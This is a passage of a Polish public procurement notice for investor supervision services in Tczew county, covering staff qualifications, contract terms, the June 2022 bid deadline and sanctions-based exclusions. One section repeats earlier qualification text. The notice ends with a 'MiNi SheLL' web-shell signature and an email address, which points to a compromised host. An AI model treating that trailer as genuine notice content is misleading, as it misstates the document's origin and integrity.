samorządach zawodowych<br/>architektów oraz inżynierów budownictwa;<br/> co najmniej 3 lata doświadczenia zawodowego na stanowisku<br/>inspektora nadzoru inwestorskiego / kierownika budowy / kierownika<br/>robót przy realizacji robót w specjalności konstrukcyjno-budowlanej;<br/>b) 1 (jedną) osobą na stanowisko Inspektora Nadzoru Inwestorskiego,<br/>posiadającą:<br/> uprawnienia budowlane upoważniające do pełnienia samodzielnej<br/>funkcji technicznej obejmującej kierowanie robotami w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w zakresie niezbędnym do<br/>realizacji przedmiotu zamówienia, zgodnie z obowiązującymi<br/>przepisami prawa oraz która w dniu podpisania umowy będzie<br/>członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą<br/>Prawo budowlane oraz ustawą o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa;<br/> co najmniej 2 lata doświadczenia zawodowego na stanowisku<br/>inspektora nadzoru inwestorskiego / kierownika budowy / kierownika<br/>robót przy realizacji robót w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">i elektroenergetycznych bez ograniczeń w zakresie niezbędnym do<br/>realizacji przedmiotu zamówienia, zgodnie z obowiązującymi<br/>przepisami prawa oraz która w dniu podpisania umowy będzie<br/>członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą<br/>Prawo budowlane oraz ustawą o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa;<br/> co najmniej 2 lata doświadczenia zawodowego na stanowisku<br/>inspektora nadzoru inwestorskiego / kierownika budowy / kierownika<br/>robót przy realizacji robót w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia w trybie<br/>art. 58 ust. 1 Ustawy (np. Konsorcjum bądź spółka cywilna), ustanawiają oni<br/>Pełnomocnika do reprezentowania Wykonawców w postępowaniu albo do<br/>reprezentowania i zawarcia umowy, na podstawie art. 58 ust. 2 Ustawy.<br/>Pełnomocnictwo powinno być załączone do oferty.<br/>10.2 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden<br/>z nich nie może podlegać wykluczeniu, w zakresie określonym w Rozdziale 7 SWZ.<br/>10.3 Zgodnie z art. 117 ust. 4 Ustawy, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy. Wzór przedmiotowego oświadczenia stanowi Załącznik Nr 3<br/>do SWZ.<br/>10.4 Wykonawcy wspólnie ubiegający się o udzielenie zamówienie ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy, zgodnie z art. 445 ust. 1 Ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień niniejszej umowy mogą być dokonane za zgodą obu stron wyrażona<br/>na piśmie pod rygorem nieważności w następujących przypadkach:<br/>1) zmiany osoby sprawującej nadzór inwestorski – polegająca na wyznaczeniu nowej<br/>osoby pełniących daną funkcję, pod warunkiem, zgodności z postanowieniami SWZ<br/>i wyłącznie na uzasadniony wniosek Nadzoru, za zgodą Zamawiającego.<br/>2) zmiany/zamiaru powierzenia części zamówienia podwykonawcy na zasadach,<br/>o których mowa w §9 niniejszej umowy;<br/>3) konieczności zmiany podatku VAT, w związku ze zmianą powszechnie<br/>obowiązujących przepisów prawa.<br/>2. Nadzór Inwestorski jest zobowiązany do pisemnego poinformowania Zamawiającego<br/>o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na adres<br/>wskazany we wstępie umowy uważa się za skutecznie dostarczoną.<br/>3. Zamawiający dopuszcza zmianę postanowień umowy w przypadku zmiany powszechnie<br/>obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu<br/>umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_tczew</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835), tj.:<br/>a) wymienionego w wykazach określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji<br/>w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 ww. ustawy;<br/>b) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca<br/>2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu<br/>(Dz.U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo<br/>wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24<br/>lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie<br/>wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.<br/>1 pkt 3 ww. ustawy;<br/>c) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia<br/>29 września 1994 r. o rachunkowości (Dz.U. z 2021 r. poz. 217, 2105 i 2106)<br/>jest podmiot wymieniony w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką<br/>jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ww. ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com